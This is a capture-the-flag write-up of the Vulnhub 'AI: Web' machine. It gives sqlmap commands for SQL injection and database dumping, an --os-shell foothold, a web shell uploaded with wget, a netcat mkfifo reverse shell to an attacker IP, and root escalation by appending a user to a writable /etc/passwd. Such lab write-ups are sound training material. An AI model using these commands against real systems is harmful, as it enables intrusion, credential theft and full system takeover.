Vulnhub - AI:Web writeup
AI: Web
Author: Mohammad Ariful Islam
Nmap
There is only single port open and that too have some hidden directories. Let’s see what else we can find from HTTP service.
HTTP
When we visit the website we get a message Not even Google search my contents!
That message is reference to robots.txt
because that is the file use to allow or disallow google from scraping.
In robots.txt
we have 2 entries /m3diNf0/
, /se3reTdir777/uploads/
.
But When I tried visiting /m3diNf0/
or /se3reTdir777/uploads/
I got 403
Forbidden error, meaning I cannot view the content of those page.
I ran dirsearch on /m3diNf0/
and found info.php
If we open that info.php
it contains simple information about the system.
But when I opened the http://192.168.184.135/se3reTdir777/
I got a very basic form asking me about UserID
.
I started to submit id as 1,2,3...
When I submitted UserId as 4
I got error.
sqlmap
I tested this field for SQLi with sqlmap
. I captured the requests and saved it in a file named sql.txt
and then passed that file to sqlmap.
➜ sqlmap -r /home/mzfr/sql.txt --dbs
➜ sqlmap -r /home/mzfr/sql.txt -D aiweb1 --tables
➜ sqlmap -r /home/mzfr/sql.txt -D aiweb1 --dump
Since all the hashes are just base64 encoded so I decoded them and only one of them was legit.
aiweb1pwn:MyEvilPass_f908sdaf9_sadfasf0sa
but since there is no service to login we can’t use this.
I found out that we can use --os-shell
with sqlmap to get the shell.
I ran
sqlmap -r /home/mzfr/sql.txt -D aiweb1 --os-shell
and then selected following options:
I figured out that custom path from the info.php
we found in the starting.
And with that I got the shell.
From this I uploaded a phpbash
shell using wget
Now we can visit se3reTdir777/uploads/phpbash.php
and we’ll have a phpbash shell.
So Now from this shell I ran
$ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.184.1 4444 >/tmp/f
Privilege escalation
I downloaded the enumeration script and ran it and I found out that there are two users aiweb1
and aiweb1pwn
I ran find / -user www-data -type f 2>/dev/null
and found that www-data
can edit /etc/passwd
which is nice.
I ran echo "toor:sXuCKi7k3Xh/s:0:0::/root:/bin/bash" >> /etc/passwd
this will add a new user named toor
with password toor
having root
access.
Then I su
to toor and got the root-shell.
now get the flag from the root directory.
This was an awesome machine with something new for me. I didn’t knew that we can use sqlmap for getting a shell.
Thanks to @arif_xpress for making this machine.
Thanks for reading, Feedback is always appreciated.
Follow me @0xmzfr for more “Writeups”.